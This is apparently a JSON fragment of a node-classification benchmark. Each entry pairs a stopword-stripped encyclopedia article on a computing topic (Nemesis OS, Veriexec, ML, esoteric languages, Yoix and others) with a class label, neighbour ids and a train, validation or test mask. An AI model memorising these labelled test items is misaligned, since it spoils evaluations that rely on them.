    "text": "ElephantDrive:elephantdrive elephantdrive storage virtualization service used primarily online backup tool also remote access service/collaboration tool service runs windows mac platforms allows users create simple automated rules protecting data moving elephantdrive account elephantdrive makes use infrastructure-on-demand part architecture one first popular examples applications built amazon s3 simple storage service elephantdrive initially utilized amazon s3 tool datacenter migration quickly moved production infrastructure elephantdrive first major breakthrough came conjunction 2008 closing early cloud storage provider aol property xdrive service offered free tool migrating files xdrive platform simplifying process switching providers company turned focus network attached storage nas space designing deploying cloud storage optimized run natively nas devices series partnerships hardware makers initial partnership netgear storage product line readynas systems form co-branded embedded cloud backup service called readynas vault additional cloud storage nas integration launched hardware makers qnap thecus opted use elephantdrive brand opposed vault co-branding",
    "neighbors": [
      11201,
      6565,
      1801,
      6797,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 7382,
    "label": 2,
    "text": "Nemesis_(operating_system):nemesis operating system nemesis operating system designed university cambridge university glasgow swedish institute computer science citrix systems nemesis conceived multimedia uses mind microkernel environment application typically implemented number processes servers performing work behalf one client leads enormous difficulty accounting resource usage kernel-based system multimedia applications spend time kernel leading similar problems guiding principle design nemesis structure operating system way majority code could execute application process nemesis therefore extremely small lightweight kernel performed operating system functions shared libraries executed user process isas nemesis supports include x86 intel i486 pentium pentium pro pentium ii alpha arm strongarm sa-110 nemesis also runs evaluation boards 21064 21164",
    "neighbors": [
      2560,
      6155,
      6675,
      7187,
      10776,
      25,
      4637,
      9762,
      4643,
      6180,
      5158,
      7217,
      10803,
      9784,
      10809,
      576,
      2625,
      3142,
      6221,
      3160,
      10333,
      97,
      11363,
      6760,
      10856,
      8298,
      9835,
      7285,
      4727,
      2168,
      9335,
      634,
      1147,
      3197,
      1150,
      5247,
      11390,
      2179,
      10883,
      10891,
      6797,
      10382,
      1168,
      9366,
      6296,
      2201,
      9370,
      9882,
      7325,
      9887,
      8879,
      3248,
      178,
      9907,
      6837,
      6329,
      8889,
      5823,
      8388,
      1736,
      2248,
      9932,
      5840,
      8410,
      9436,
      1247,
      11489,
      1253,
      7403,
      9964,
      242,
      5363,
      2804,
      9466,
      5371,
      2811,
      9468,
      1278,
      10499,
      1804,
      273,
      8977,
      787,
      11539,
      789,
      5397,
      10016,
      292,
      10235,
      2345,
      7983,
      2355,
      10548,
      7477,
      823,
      4409,
      6459,
      7483,
      7999,
      11075,
      4423,
      5452,
      6988,
      5457,
      11601,
      7507,
      7511,
      10590,
      3426,
      8551,
      5484,
      7020,
      11635,
      5492,
      2933,
      376,
      8573,
      7039,
      8063,
      10113,
      8069,
      394,
      3978,
      4492,
      7057,
      11667,
      11675,
      8092,
      2462,
      5022,
      421,
      1445,
      935,
      4521,
      9643,
      4525,
      11184,
      7601,
      10676,
      6075,
      6078,
      9151,
      11204,
      11205,
      4040,
      8136,
      9166,
      10730,
      10731,
      8687,
      6128,
      5105,
      499,
      5619,
      5115
    ],
    "mask": "Test"
  },
  {
    "node_id": 7383,
    "label": 2,
    "text": "Veriexec:veriexec veriexec file-signing scheme netbsd operating system introduces special device node /dev/veriexec signature list loaded kernel list contains file paths together hashes expected file type direct executables indirect scripts file shared libraries regular files kernel verifies contents signed files hashes opened exec open system call veriexec enabled level 0 kernel simply warn signature mismatches level 1 prevent access mismatched files level 2 prevents signed files overwritten deleted highest level 3 kernel allow unsigned files accessed",
    "neighbors": [
      1286,
      1801,
      10000,
      274,
      9762,
      8998,
      1071,
      11184,
      11698,
      9671,
      1993,
      8909,
      1361,
      4571,
      7907,
      10851,
      2415,
      8816,
      2545,
      11506,
      3571,
      5492,
      9343
    ],
    "mask": "None"
  },
  {
    "node_id": 7384,
    "label": 5,
    "text": "Konversation:konversation konversation internet relay chat irc client built kde platform free software released terms gnu general public license konversation currently maintained kde extragear network module means release cycle independent main kde applications default irc client many prominent linux distributions opensuse kde spin fedora kubuntu konversation supports ipv6 connections offers ssl server support supports blowfish encryption also supports identity management multiple server connections using separate identities different servers display multiple servers channels one window konversation features automatic utf-8 detection support different encodings different channels also features optional on-screen display osd message notifications save bookmarks channels servers konversation supports colors text decorations themable nicklist icons konversation also scriptable using shell scripts via d-bus includes support aliases action system automatic events also identifies different users conversation window choosing random color user",
    "neighbors": [
      5760,
      5251,
      6797,
      7181,
      10387,
      5397,
      543,
      6694,
      8621,
      7861,
      823,
      10687,
      5316,
      3407,
      5199,
      6991,
      2387,
      3030,
      5470,
      2409,
      5612,
      6257,
      2804,
      3828,
      6389,
      3959
    ],
    "mask": "Test"
  },
  {
    "node_id": 7385,
    "label": 2,
    "text": "DAVIX:davix davix live cd based slackware purposes computer security operations distribution focuses data analysis visualization davix stands data analysis visualization linux first live cd integrate many visualization tools long-term goal distribution provide good set tools supporting complete process visual data analysis jan monsch began work cd december 2007 discussions raffael marty january 2008 jan agreed produce cd applied security visualization based list utilities raffael discussed book davix contains collection 25 free tools data processing visualization examples tools davix cd ships 15 chapter manual covers davix use customization examples screenshots additionally utilities system documentation pages davix cd based slax computer information security visualization form visualization computer graphics enterprise environments computer security information generated large volumes become difficult analyze without visual context using davix security engineer visually spot anomalies network traffic changes ip sources/destinations network protocols application protocols traffic patterns frequency volume davix released black hat briefings/def con august 2008",
    "neighbors": [
      8837,
      7435,
      10127,
      2321,
      5397,
      4887,
      1150,
      10394,
      3486,
      673,
      3745,
      10530,
      9253,
      10149,
      11305,
      7854,
      2738,
      4790,
      439,
      56,
      59,
      7483,
      3903,
      4673,
      2375,
      4039,
      842,
      8907,
      1110,
      9693,
      2914,
      2275,
      485,
      3685,
      9064,
      4841,
      6890,
      7913,
      7020,
      10860,
      7534,
      2671,
      7920,
      8177,
      9074,
      5363,
      2292,
      9461,
      6393,
      11388,
      8957,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 7386,
    "label": 9,
    "text": "ML_(programming_language):ml programming language ml meta language general-purpose functional programming language roots lisp characterized lisp types known use polymorphic hindley–milner type system automatically assigns types expressions without requiring explicit type annotations ensures type safetythere formal proof well-typed ml program cause runtime type errors ml provides pattern matching function arguments garbage collection imperative programming call-by-value currying used heavily programming language research one languages completely specified verified using formal semantics types pattern matching make well-suited commonly used operate formal languages compiler writing automated theorem proving formal verification features ml include call-by-value evaluation strategy first-class functions automatic memory management garbage collection parametric polymorphism static typing type inference algebraic data types pattern matching exception handling ml uses static scoping rules ml referred impure functional language although encourages functional programming allow side-effects like languages lisp unlike purely functional language haskell like programming languages ml uses eager evaluation meaning subexpressions always evaluated though lazy evaluation achieved use closures thus one create use infinite streams haskell expression indirect ml strengths mostly applied language design manipulation compilers analyzers theorem provers general-purpose language also used bioinformatics financial systems ml developed robin milner others early 1970s university edinburgh whose syntax inspired iswim historically ml conceived develop proof tactics lcf theorem prover whose language pplambda combination first-order predicate calculus simply-typed polymorphic lambda calculus ml metalanguage today several languages ml family three prominent standard ml sml ocaml f ideas ml influenced numerous languages like haskell cyclone nemerle ats elm following examples use syntax standard ml ml dialects ocaml f differ small ways factorial function expressed pure ml describes factorial recursive function single terminating base case similar descriptions factorials found mathematics textbooks much ml code similar mathematics facility syntax part definition shown optional describes types function notation e read expression e type instance argument n assigned type integer int fac n int result applying fac integer n also type integer function fac whole type function integer integer int int fac accepts integer argument returns integer result thanks type inference type annotations omitted derived compiler rewritten without type annotations example looks like function also relies pattern matching important part ml programming note parameters function necessarily parentheses separated spaces function argument 0 zero return integer 1 one cases second line tried recursion executes function base case reached implementation factorial function guaranteed terminate since negative argument causes infinite descending chain recursive calls robust implementation would check nonnegative argument recursing follows problematic case n negative demonstrates use ml exception system function improved writing inner loop tail-recursive style call stack need grow proportion number function calls achieved adding extra accumulator parameter inner function last arrive following function reverses elements list precisely returns new list whose elements reverse order compared given list implementation reverse correct clear inefficient requiring quadratic time execution function rewritten execute linear time following efficient though less easy-to-read style notably function example parametric polymorphism consume lists whose elements type return lists type modules ml system structuring large projects libraries module consists signature file one structure files signature file specifies api implemented like c header file java interface file structure implements signature like c source file java class file example following define arithmetic signature implementation using rational numbers imported interpreter 'use command interaction implementation allowed via signature functions example possible create 'rat data object directly via code 'structure block hides implementation detail outside ml standard libraries implemented modules way",
    "neighbors": [
      512,
      2304,
      9345,
      5623,
      7558,
      6536,
      8587,
      397,
      10510,
      6160,
      3601,
      11028,
      2069,
      5783,
      8088,
      2585,
      11032,
      3613,
      5920,
      10145,
      8738,
      3876,
      4134,
      5031,
      2216,
      5033,
      5040,
      1333,
      11574,
      2617,
      9914,
      10043,
      10555,
      10049,
      963,
      8262,
      3144,
      7627,
      10571,
      7889,
      6228,
      10581,
      9047,
      10584,
      8924,
      10460,
      1889,
      7394,
      1124,
      228,
      6502,
      10983,
      4846,
      6767,
      5365,
      1399,
      3705,
      10618,
      5885
    ],
    "mask": "Test"
  },
  {
    "node_id": 7387,
    "label": 3,
    "text": "MultiProcessor_Specification:multiprocessor specification multiprocessor specification mps x86 architecture open standard describing enhancements operating systems firmware allow work x86-compatible processors multi-processor configuration mps covers advanced programmable interrupt controller apic architectures version 1.1 specification released april 11 1994 version 1.4 specification released july 1 1995 added extended configuration tables improve support multiple pci bus configurations improve expandability linux kernel freebsd known support intel mps utility called 'mptable used examine mps table motherboards since newer machines support advanced configuration power interface acpi subsumes mps functionality mps part supplanted acpi mps still useful machines operating systems support acpi",
    "neighbors": [
      833,
      9541,
      7783,
      4491,
      9582,
      7983,
      3537,
      2514,
      7313,
      2516,
      9500,
      10620,
      9369,
      4444,
      8125,
      3294
    ],
    "mask": "Test"
  },
  {
    "node_id": 7388,
    "label": 7,
    "text": "Global_Information_Grid:global information grid global information grid gig all-encompassing communications project united states department defense defined globally interconnected end-to-end set information capabilities collecting processing storing disseminating managing information demand warfighters policy makers support personnel gig includes owned leased communications computing systems services software including applications data security services associated services national security systems non-gig information technology includes stand-alone self-contained embedded connected enterprise network new definition removes references national security systems defined section 5142 clinger-cohen act 1996 new definition removes references gig providing capabilities operating locations bases posts camps stations facilities mobile platforms deployed sites lastly definition removes part definition discusses interfaces coalition allied non-department defense users systems dod use term gig undergoing changes department deals new concepts cyberspace operations gig 2.0 joint staff j6 initiative department defense information enterprise die gig managed construct known netops netops defined operational framework consisting three essential tasks situational awareness sa command control c2 commander cdr united states strategic command usstratcom coordination dod global netops community employs operate defend gig ensure information superiority department defense information enterprise defined dod information resources assets processes required achieve information advantage share information across department defense mission partners includes network-centric warfare ncw doctrine represents fundamental shift military culture away compartmentalized war machines toward interconnected units operating cohesively tenets network centric warfare enterprise level forging new paths components military communicate ease logistics burdens improve communication combat effectiveness war fighter decrease instances confusion-related fratricide accelerate trend minimizing collateral damage hasten flow business warfighter situational awareness would improved tremendously linking sees overhead satellite sees fog war would lifted seamless communication unit members site detection devices commanders operating behind line improved coordination may also assist delivering appropriate firepower tangible assets first responders domestic attacks natural disasters worldwide",
    "neighbors": [
      774,
      7528,
      8968,
      9480,
      6861,
      2607,
      8091,
      9725,
      1567
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7389,
    "label": 7,
    "text": "Wolf_Frameworks:wolf frameworks wolf frameworks web application designing development platform service based india united states represented via partners worldwide founded 2006 cloud computing infrastructure offered company enables users design deliver cross platform saas applications without writing technical code wolf 100 ajax xml .net based enables building mashable interoperable web applications using browser internet connection knowledge modelling business",
    "neighbors": [
      4194,
      10020,
      4107,
      467,
      3573,
      2901,
      479
    ],
    "mask": "Train"
  },
  {
    "node_id": 7390,
    "label": 4,
    "text": "Geospatial_authentication:geospatial authentication software package designed allow authentication determining rover is/are within set boundaries specific area access critical geospatial information using gps signal structures means authenticate mobile devices network wirelessly real-time developed advantage lies system allows designated geospatial boundaries areas server geospatial authentication software two parts — server client server software virtual private network vpn developed linux operating system using perl programming language server stand-alone vpn server combined applications services client software gui windows ce software mobile graphical software allows users authenticate network purpose client software pass needed satellite information server authentication work done stacey d. lyle geospatial research innovation design nasa ’ stennis space center",
    "neighbors": [
      5749
    ],
    "mask": "Train"
  },
  {
    "node_id": 7391,
    "label": 5,
    "text": "RTP_Control_Protocol:rtp control protocol rtp control protocol rtcp sister protocol real-time transport protocol rtp basic functionality packet structure defined rfc 3550 rtcp provides out-of-band statistics control information rtp session partners rtp delivery packaging multimedia data transport media data primary function rtcp provide feedback quality service qos media distribution periodically sending statistics information transmitted octet packet counts packet loss packet delay variation round-trip delay time participants streaming multimedia session application may use information control quality service parameters perhaps limiting flow using different codec typically rtp sent even-numbered udp port rtcp messages sent next higher odd-numbered port rtcp provide flow encryption authentication methods mechanisms may implemented example secure real-time transport protocol srtp defined rfc 3711 rtcp provides basic functions expected implemented rtp sessions rtcp reports expected sent participants even multicast session may involve thousands recipients traffic increase proportionally number participants thus avoid network congestion protocol must include session bandwidth management achieved dynamically controlling frequency report transmissions rtcp bandwidth usage generally exceed 5 total session bandwidth furthermore 25 rtcp bandwidth reserved media sources times large conferences new participants receive cname identifiers senders without excessive delay rtcp reporting interval randomized prevent unintended synchronization reporting recommended minimum rtcp report interval per station 5 seconds stations transmit rtcp reports often every 5 seconds rtcp distinguishes several types packets sender report receiver report source description goodbye addition protocol extensible allows application-specific rtcp packets standards-based extension rtcp extended report packet type introduced rfc 3611 large-scale applications internet protocol television iptv long delays minutes hours rtcp reports may occur rtcp bandwidth control mechanism required control congestion see protocol functions acceptable frequencies usually less one per minute affords potential inappropriate reporting relevant statistics receiver cause evaluation media sender inaccurate relative current state session methods introduced alleviate problems rtcp filtering rtcp biasing hierarchical aggregation hierarchical aggregation also known rtcp feedback hierarchy optimization rtcp feedback model aim shift maximum number users limit together quality service qos measurement rtcp bandwidth constant takes 5 session bandwidth therefore reporting interval qos depends among others number session members large sessions become high minutes even hours however acceptable interval 10 seconds reporting bigger values would cause time-shifted inaccurate reported status current session status optimization made sender could even negative effect network qos conditions hierarchical aggregation used source-specific multicast single source allowed i.e iptv another type multicast could any-source multicast suitable large-scale applications huge number users modern iptv systems use hierarchical aggregation feedback target new type member firstly introduced internet draft draft-ietf-avt-rtcpssm-13 hierarchical aggregation method extended functionality function member receive receiver reports rr see rtcp retransmit summarized rr packets so-called receiver summary information rsi sender case single level hierarchy",
    "neighbors": [
      10242,
      3847,
      649,
      9868,
      3218,
      9365,
      10005,
      11413,
      5402,
      5531,
      3742,
      10270,
      10271,
      9380,
      2085,
      9381,
      3751,
      3752,
      10924,
      562,
      2996,
      9909,
      10171,
      4797,
      5181,
      3133,
      3006,
      5437,
      7364,
      2887,
      8265,
      2509,
      4687,
      6993,
      5843,
      2904,
      5469,
      5470,
      5471,
      5472,
      10341,
      10344,
      11112,
      367,
      8432,
      6651
    ],
    "mask": "Test"
  },
  {
    "node_id": 7392,
    "label": 9,
    "text": "PicoLisp:picolisp picolisp programming language dialect language lisp runs operating systems including linux others portable operating system interface posix compliant prominent features simplicity minimalism built one internal data type cell language level programmer use three different data types numbers symbols lists represented cells differentiated bits end cell free open-source software released mit license x11 functions accept arbitrary types numbers arguments macros needed rare cases implemented using quote function picolisp include lisp lambda function quote function changed return arguments unevaluated codice_1 first special feature intrinsic create read update delete crud functioning persistent symbols first-class citizens objects loaded database files automatically accessed written back modified applications written using class hierarchy entities relations features include prolog engine database engine database queries distributed databases inlining c language functions native c function calls child process management interprocess communication browser graphical user interface gui internationalization localization 1980s picolisp began development macintosh used commercial application development since ported dos sco unix since 1993 used mainly linux mid-1990s database functions added first versions written mix c assembly language 1999 first rewrite scratch done fully c. 2002 version released gnu general public license gnu gpl 2010 changed mit/x11 license 2009 64-bit version released another rewrite time written generic assembly turn implemented picolisp version adds support coroutines december 2010 java version named ersatz picolisp released september 2014 burger announced pilmcu project picolisp development listserv effort george orais implement picolisp hardware directly summer 2016 development pilbox picolisp box – generic android app allowing write apps pure picolisp – started still developed maintained",
    "neighbors": [
      10752,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      2585,
      4122,
      4633,
      8226,
      5677,
      3119,
      2105,
      3132,
      6717,
      8258,
      8771,
      8262,
      1613,
      9299,
      10841,
      3675,
      7267,
      2660,
      8293,
      2666,
      5751,
      7805,
      9345,
      1159,
      1673,
      9865,
      9877,
      5803,
      2225,
      6840,
      7867,
      4799,
      11457,
      7880,
      8908,
      205,
      5837,
      5852,
      10463,
      7392,
      7904,
      11488,
      8421,
      11495,
      5356,
      4846,
      5360,
      5361,
      9969,
      8435,
      9975,
      6906,
      2304,
      4865,
      4867,
      5380,
      3334,
      6919,
      3336,
      1301,
      791,
      10012,
      3869,
      2335,
      2849,
      7981,
      7983,
      2352,
      10547,
      11255,
      823,
      311,
      6969,
      3408,
      6994,
      1365,
      2901,
      2392,
      10083,
      6502,
      11625,
      3446,
      10104,
      377,
      4992,
      7562,
      6556,
      6047,
      1952,
      10145,
      4516,
      5031,
      1448,
      5033,
      9128,
      7616,
      5569,
      6594,
      4550,
      11218,
      10712,
      3034,
      11226,
      477,
      3051,
      5611,
      4598,
      7670,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 7393,
    "label": 7,
    "text": "Foundation_network:foundation network relayware formerly foundation network vendor partner relationship management prm solutions delivers businesses internet using software service model foundation network founded 1997 former business consultant technologist simon wallace-jones later year company secured first global customer 3com network infrastructure vendor april 2008 foundation network announced release relayware 8 next-generation prm software foundation network became relayware 2010 established headquarters redwood shores california usa",
    "neighbors": [
      467
    ],
    "mask": "Validation"
  },
  {
    "node_id": 7394,
    "label": 9,
    "text": "Robert_Harper_(computer_scientist):robert harper computer scientist robert william bob harper jr. computer science professor carnegie mellon university works programming language research harper made major contributions design standard ml programming language lf logical framework harper named acm fellow 2005 awarded honor contributions type systems programming languages 2003–2008 harper hosted progressive talk show left wrct-fm fellow host carnegie mellon university school computer science faculty member danny sleator",
    "neighbors": [
      7808,
      10049,
      11490,
      3876,
      8262,
      6536,
      1936,
      5585,
      6070,
      7386
    ],
    "mask": "None"
  },
  {
    "node_id": 7395,
    "label": 9,
    "text": "Esoteric_programming_language:esoteric programming language esoteric programming language sometimes shortened esolang programming language designed test boundaries computer programming language design proof concept software art hacking interface another language particularly functional programming procedural programming languages joke use esoteric distinguishes languages programming languages working developers use write software usually esolang creators intend language used mainstream programming although esoteric features visuospatial syntax inspired practical applications arts languages often popular among hackers hobbyists usability rarely goal esoteric programming language designers—often design leads quite opposite usual aim remove replace conventional language features still maintaining language turing-complete even one computational class unknown earliest still canonical example esoteric language intercal designed 1972 woods james m. lyon stated intention unlike programming language authors familiar parodied elements established programming languages day fortran cobol assembly language many years intercal represented paper copies intercal manual language revival 1990 implementation c unix stimulated wave interest intentional design esoteric computer languages 1993 wouter van oortmerssen created false small stack-oriented programming language syntax designed make code inherently obfuscated confusing unreadable also compiler 1024 bytes inspired urban müller create even smaller language now-infamous brainfuck consists eight recognized characters along chris pressey befunge like false two-dimensional instruction pointer brainfuck one best-supported esoteric programming languages canonical examples minimal turing tarpits needlessly obfuscated language features brainfuck related p′′ family turing machines turing tarpit turing-complete programming language computable function could theoretically written impractically difficult esoteric languages may described turing tarpits especially aim minimize number language features method encoding programs substring encoding instruction single instruction always includes two sequential phases choosing operation executing list operations may either static—as remorse thrat—or dynamic—as remorse4ever example based remorse thrat paradigm language fall number categories categories used get general understanding way specific language operates include imperative languages brainfuck instructions describe change data functional languages unlambda data code less interchangeable execution repeated application functions results functions rewriting languages thue transformation functions applied initial state funge esoteric programming language models programs metric spaces coordinate systems often necessarily cartesian execute instructions located points program space moving instruction pointer position vector indicates currently executing instruction space different instructions determine direction instruction pointer moves consequently sequence instructions executed current official standard behaviour programming languages funge-98 specification specification generalisation semantics befunge programming language two-dimensional toroidal topology languages adhere closely standard unefunge one-dimensional trefunge three-dimensional sometimes called funges distant relatives differ significant respects referred fungeoids one instruction set computer machine supports one operation deterministic language one given current state program next state always predicted true nondeterministic language languages deterministic languages befunge supply built-in randomization instruction moreover languages java2k randomized instructions thus getting even trivial programs reliable output often monumental outright impossible task nondeterministic languages used explore large search spaces grammars exhaustive search impractical random text generators dada engine rmutt examples kind nondeterminstic language esoterically nondeterministic algorithms employed theoretical investigation hypercomputation characteristic examples esoteric programming languages arnoldc esoteric programming language based one-liners arnold schwarzenegger following hello world programmed arnoldc showtime talk hand hello world terminated asciidots esoteric programming language based ascii art language dots represented periods codice_1 travel ascii art paths undergo operations example code golf counter 1/ befunge allows instruction pointer roam multiple dimensions code example following program displays hello world pushing characters reverse order onto stack printing characters loop circulates clockwise instructions codice_2 codice_3 codice_4 codice_5 codice_6 codice_7 binary lambda calculus designed algorithmic information theory perspective allow densest possible code minimal means featuring 29 byte self interpreter 21 byte prime number sieve 112 byte brainfuck interpreter brainfuck designed extreme minimalism leads obfuscated code programs containing eight distinct characters following program outputs hello world chef david morgan-mar stack-oriented programming language designed make programs look like cooking recipes programs consist title list variables data values list stack manipulation instructions joking design principle states program recipes generate valid output easy prepare delicious morgan-mar notes example hello world program 101 eggs 111 cups oil would produce lot food one person false stack-based language single-character commands variables example 3 1 calculated evaluating λ x → x 1 3 fim++ object-oriented programming language based television show fim++ programs read like plain english style show 'friendship reports following program prints hello world fim++ supports many modern language features interfaces inheritance importing files uniquely variable names contain spaces fim++ dear princess celestia hello world today learned say hello world said hello world say hello world faithful student twilight sparkle fractran program ordered list positive fractions together initial positive integer input formula_1 program run multiplying integer formula_1 first fraction formula_3 list formula_4 integer integer formula_1 replaced formula_4 rule repeated fraction list produces integer multiplied formula_1 program halts fractran invented mathematician john conway .gertrude named gertrude stein designed gerson kurz enable programs vaguely resemble poetry programs golfscript consist lists items pushed onto stack encountered exception variables code blocks value case code executed grass functional programming language uses characters codice_8 codice_9 codice_4 thus programs grass said look like ascii art grass grass formal specification based untyped lambda calculus secd machine grass confused grass different programming language intercal short compiler language pronounceable acronym created 1972 parody satirize aspects various programming languages time jsfuck esoteric programming style javascript code written using six characters codice_11 codice_12 codice_13 codice_14 codice_15 codice_16 unlike brainfuck requires compiler interpreter jsfuck valid javascript code meaning jsfuck programs run web browser engine interprets javascript lolcode designed resemble speech lolcats following hello world example lolcode frequently criticized esoteric rather ordinary procedural language unusual vocabulary lollipop church esoteric programming language programs look like russian guide books lollipop church designed shakila tayefeh 7 april 2019 following hello world example gulfoffinland hello world malbolge 8th circle hell designed difficult esoteric programming language among features code self-modifying design effect instruction depends address memory modiscript esoteric programming language entirely consists quotes indian prime minister narendra modi speeches language follows many ideologies import rule importation code allowed consistent make india campaign following code prints mandir wahin banayenge mitrooon bjp governed state hai sp opposition hai agar ye sach hai nahi toh achhe din aa gaye piet language designed david morgan-mar whose programs bitmaps look like abstract art compilation guided pointer moves around image one continuous coloured region next procedures carried pointer exits region 20 colours behaviour specified 18 colourful colours ordered 6-step hue cycle 3-step brightness cycle black white ordered exiting colourful colour entering another one performed procedure determined number steps change hue brightness black entered pointer tries enter black region rules choosing next block changed instead possible rules tried program terminates regions outside borders image also treated black white perform operations allows pointer pass behaviour colours 20 specified left compiler interpreter variables stored memory signed integers single stack specified procedures deal operations stack others input/output rules compilation pointer moves piet named dutch painter piet mondrian originally intended name mondrian already taken pikachu esoteric programming language developed nilabhro datta whose programs look like dialect pikachu stated purpose easily usable pikachu programs written language readable writable pikachu end pikachu makes use 3 valid syntax elements codice_17 codice_18 codice_19 rockstar designed creating computer programs also song lyrics heavily influenced lyrical conventions 1980s hard rock power ballads dynamically typed turing-complete following example line code multiplies value codice_20 codice_21 stores codice_22 shakespeare designed make programs look like shakespearean plays example following statement declares point program reached via goto-type statement train completely visual programming language looks like wooden train set engines threads train cars memory cargo cars variables train contains multiple data types including blocks numbers colors dinosaurs stations operate cargo e.g increment decrement add subtract catapult type specific wyes direct flow trains include greater less prompt random magic tunnels allow creation functions unlike programming languages distinction code memory output train program state defined arrangement train pieces unlambda minimalist functional programming language based ski calculus combined first-class continuations imperative i/o input usually requiring use continuations whitespace uses whitespace characters space tab return ignoring characters reverse many traditional languages distinguish different whitespace characters treating tab space also allows whitespace programs hidden source code programs languages like c. ~ath esoteric programming language used humans trolls webcomic homestuck name spoken tilde ath pun til death known insufferable work despite relative simplistic syntax language compile using infinite loops context story capability import change objects wide library author universe wide range combined inability interact anything short lifespan leads files tied long-term events deaths characters universes ~ath also sensitive color text written accepts unusual characters one ~ath program shown story uses command called bifurcate split program red text blue text another ~ath program contains character appears animated flickering billiard ball ~ath code simplest language code deviating pattern compile cultural context esolangs studied people like geoff cox writes esolangs shift attention command control toward cultural expression refusal seeing esolangs similar code art code poetry mez breeze mezangelle daniel temkin describes brainfuck refusing ease boundary human expression assembly code thereby taking us ludicrous journey logic exposing inherent conflict human thinking computer logic connects programming within esolang performing event score fluxus movement playing rules logic code makes point view language clear",
    "neighbors": [
      9345,
      2691,
      3462,
      9735,
      9224,
      9871,
      5395,
      5651,
      5527,
      9626,
      3613,
      4770,
      10403,
      5680,
      9780,
      1591,
      4410,
      1470,
      191,
      963,
      10819,
      8262,
      9926,
      10953,
      4042,
      5204,
      5845,
      477,
      10335,
      4838,
      8171,
      9330,
      9331,
      5492,
      3960,
      2556,
      7421
    ],
    "mask": "Test"
  },
  {
    "node_id": 7396,
    "label": 9,
    "text": "WMLScript:wmlscript wmlscript procedural programming language dialect javascript used wml pages part wireless application protocol wap wmlscript client-side scripting language similar javascript like javascript wmlscript used tasks user input validation generation error message dialog boxes etc wmlscript based ecmascript european computer manufacturers association script javascript standardized version thus syntax wmlscript similar javascript fully compatible despite syntactical similarities two different languages wmlscript objects array javascript hand allows declare include external functions scripts wmlscript optimised low power devices compiled language",
    "neighbors": [
      1409,
      259,
      1285,
      3462,
      6791,
      10507,
      8854,
      4378,
      8605,
      1695,
      7455,
      3761,
      11060,
      438,
      5311,
      2880,
      7871,
      9152,
      4171,
      11087,
      339,
      84,
      4822,
      4056,
      9560,
      603,
      482,
      5219,
      487,
      11240,
      5483,
      9195,
      10991,
      10097,
      5875,
      9207,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 7397,
    "label": 7,
    "text": "Reval_(company):reval company reval software company reval ’ cloud-based software provides clients tools manage cash financial risks company headquartered new york city regional offices emea apac reval led ceo chairman co-founder jiro okochi reval founded 1999 jiro okochi woo song 2009 company acquired fxpress corporation leading treasury software provider fortune 1000 2011 acquired european treasury management provider ecofinance 2012 2013 reval global finance magazine treasury cash management award best financial risk management solution.in october 2016 reval acquired ion investment group little kids rock lkr leading nonprofit provider free musical instruments teacher trainings u.s. public schools appointed jiro okochi new york area board directors spearhead fundraising efforts lkr ’ new york metro area program",
    "neighbors": [
      4194
    ],
    "mask": "None"
  },
  {
    "node_id": 7398,
    "label": 9,
    "text": "Yoix:yoix computer programming yoix high-level general-purpose interpreted dynamic programming language yoix interpreter implemented using standard java technology without add-on packages requires sun-compliant jvm operate initially developed labs researchers internal use available free open source software since late 2000 1998 java technology still emerging swing toolkit add-on package interruptible i/o regular expressions printf capability yet features java web start developed moreover java scripting languages largely non-existent time groovy jruby yet invented jython created late 1997 browsers 1998 limited feature sets unstable production use 8-hour shift still fighting skirmishes browser wars environment yoix technology created response pressing need reliable easy distribute maintain gui front-end mission-critical application developed within namely global fraud management system day monitors tracks fraud activity related voice traffic expanding networks wireline wireless ip yoix technology first released public late 2000 open source initiative common public license v1.0 yoix name came partially fox hunting cry encouragement hounds partially echo another familiar four-letter name ends ix partially avoid many false-positives google search yoix technology provides pure java programming language implementation general purpose dynamic programming language developed researchers labs syntax grammar easy learn familiar c programming language java end-user yoix application indistinguishable java application application developer yoix provide simpler coding experience working java directly much like writing perl code simpler writing c code yoix language object oriented language makes use 165 object types provide access standard java classes yoix interpreter built entirely using java technology means yoix applications cross-platform gui-capable network thread friendly yet yoix developers find insulated complex error-prone parts coding functionality directly java use reflection access java functionality thus adds value simplifying access functionality also improving application reliability coding java glitches complicated java features one-time behind-the-scenes yoix language includes safe pointers addressing declarations global local variables addition supporting native user functions users add builtin functions written java two central elements yoix design borrowed postscript language dictionaries language components permissions-protected dictionaries exposed system components homage tcl language exposure philosophy also given though direct influence another key yoix design element involves pointers addressing pointers pointer arithmetic yoix language syntactically similar found c language yoix implementation prevents using pointer outside bounds addition address operator always produces valid usable result overall yoix design attempted make language easy learn programmers experienced c java languages yoix distribution includes yoix web application instant template ywait software framework building yoix web application yoix web application resides web server downloaded piecemeal run-time as-needed basis yoix interpreters running client machines model analogous familiar model client web browsers downloading website piecemeal as-needed run-time permits simple efficient distribution maintenance applications relies ubiquitous web server yoix interpreter building web application using ywait framework requires standard unix tools available modern operating systems linux mac os x microsoft windows help add-on packages u/win client side ywait-based application relies yoix interpreter thus platform independent running wherever java runs yoix software development philosophy aims keep things simple eschewing popular tendency multiple embedded specialized languages ywait framework permits easy incremental screen development simple logical source tree hierarchy development yoix web application reduced basics command prompt text editor ide enthusiasts may nonplussed small beautiful approach software development highly effective practice addition role tool building gui applications yoix technology supports several modes data visualization data visualization module called ydat yoix data analysis tool included public yoix distribution since release 2.1.2 ydat uses data manager component coordinate data display filtering among several visualization components include event plot graph drawing pane histogram filters tabular detail ydat able display graphs generated graphviz graph drawing layout tool another open source tool freely available labs ydat highly configurable yoix language level image screenshot yoix ydat instantiation example used analyze vehicle auction transactions yoix technology provides good support graph drawing addition graph display mentioned part ydat module data types yoix language support building manipulating traversing graph structures native yoix functions support dot language output built-in dot language parser facilitate interaction graphviz layout engines ychart data visualization toolkit added yoix distribution release 2.2.0 ychart allows one organize display cells data two interactive ychart applications contained yoix distribution periodic table elements unicode chart program demonstrate using ychart variable width cells might occur schedule also available yoix distribution yoix distribution also includes yoix package called byzgraf rendering basic data plots line charts histograms statistical box plots currently implemented yoix language interpreted means example probably right choice computationally intensive applications unless one codes computations java module extension similarly excessive looping also display limitations interpreted language focus language interactive standalone client/server gui data visualization applications yoix technology free software licensed open source initiative common public license yoix registered trademark inc.. 1 extract html directives home page write standard output 2 build display gui two buttons titled frame i.e. window also titled border 